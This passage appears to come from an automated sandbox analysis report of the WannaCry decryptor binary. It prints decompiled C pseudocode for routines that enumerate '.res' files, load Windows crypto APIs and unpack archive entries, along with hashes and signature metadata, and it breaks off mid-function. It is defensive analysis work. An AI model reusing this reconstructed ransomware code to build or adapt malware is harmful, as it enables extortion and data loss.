                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                                      0x00403cb0
                                                      0x00403cbe
                                                      0x00403cc6
                                                      0x00403cca
                                                      0x00403cd3
                                                      0x00403cd7
                                                      0x00403ceb
                                                      0x00403e1f
                                                      0x00403e1f
                                                      0x00403e23
                                                      0x00403e34
                                                      0x00403cec
                                                      0x00403cf4
                                                      0x00403d06
                                                      0x00403d0e
                                                      0x00403d26
                                                      0x00403d2c
                                                      0x00403d32
                                                      0x00403d4b
                                                      0x00403d4d
                                                      0x00403d52
                                                      0x00403d56
                                                      0x00403d69
                                                      0x00403d6f
                                                      0x00403d75
                                                      0x00403d7b
                                                      0x00403d7f
                                                      0x00403d85
                                                      0x00403d8d
                                                      0x00403db4
                                                      0x00403dbb
                                                      0x00403dc0
                                                      0x00403dc5
                                                      0x00403dcc
                                                      0x00403dcd
                                                      0x00403dcf
                                                      0x00403d8f
                                                      0x00403d99
                                                      0x00403d9f
                                                      0x00403da6
                                                      0x00403da7
                                                      0x00403da9
                                                      0x00403da9
                                                      0x00403ddb
                                                      0x00403ddd
                                                      0x00403de4
                                                      0x00403ded
                                                      0x00403dfc
                                                      0x00403dfc
                                                      0x00403e0b
                                                      0x00403e0d
                                                      0x00403e11
                                                      0x00403e11
                                                      0x00403d85
                                                      0x00403e16
                                                      0x00403e1c
                                                      0x00403e1c
                                                      0x00403d56
                                                      0x00403d32
                                                      0x00403d0e
                                                      0x00000000
                                                      0x00403e3a
                                                      0x00403e3b
                                                      0x00403e50
                                                      0x00403e50
                                                      0x00403cd9
                                                      0x00403ce2
                                                      0x00403ce2

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                                      0x00404b78
                                                      0x00404b8c
                                                      0x00404b90
                                                      0x00404c29
                                                      0x00404c2c
                                                      0x00404b96
                                                      0x00404bab
                                                      0x00404bb8
                                                      0x00404bc5
                                                      0x00404bd2
                                                      0x00404bdf
                                                      0x00404be4
                                                      0x00404bec
                                                      0x00404bf4
                                                      0x00000000
                                                      0x00404c22
                                                      0x00404c28
                                                      0x00404c28
                                                      0x00404bf4
                                                      0x00404b7a
                                                      0x00404b80
                                                      0x00404b80

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb");
				_t47 = FindFirstFileA("*.res", _t74);
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74);
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t105 = fopen( &_v1476, "rb");
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105);
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105);
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}







































                                                      0x004080c9
                                                      0x004080d7
                                                      0x004080d9
                                                      0x004080e3
                                                      0x004080f3
                                                      0x004080f7
                                                      0x004080f7
                                                      0x004080f9
                                                      0x004080fb
                                                      0x00408102
                                                      0x00408110
                                                      0x00408111
                                                      0x0040811a
                                                      0x0040811e
                                                      0x0040820a
                                                      0x0040821c
                                                      0x00408237
                                                      0x00408266
                                                      0x0040826c
                                                      0x00408276
                                                      0x0040827b
                                                      0x00408280
                                                      0x00408285
                                                      0x00408287
                                                      0x0040828f
                                                      0x004082b8
                                                      0x004082b8
                                                      0x00408291
                                                      0x0040829d
                                                      0x004082a2
                                                      0x00000000
                                                      0x00408124
                                                      0x0040812a
                                                      0x004081e4
                                                      0x004081e4
                                                      0x004081e8
                                                      0x004081f1
                                                      0x004081f7
                                                      0x004081f9
                                                      0x00408130
                                                      0x00408138
                                                      0x0040814a
                                                      0x00408152
                                                      0x0040816a
                                                      0x00408170
                                                      0x00408176
                                                      0x00408187
                                                      0x00408189
                                                      0x0040818e
                                                      0x004081a0
                                                      0x004081a2
                                                      0x004081a8
                                                      0x004081b9
                                                      0x004081b9
                                                      0x004081be
                                                      0x004081cb
                                                      0x004081d0
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081d0
                                                      0x0040818e
                                                      0x00408176
                                                      0x00408152
                                                      0x00000000
                                                      0x004081ff
                                                      0x00408200
                                                      0x00408206
                                                      0x00000000
                                                      0x00408206
                                                      0x004081f9

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150);
										L00412CEC();
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
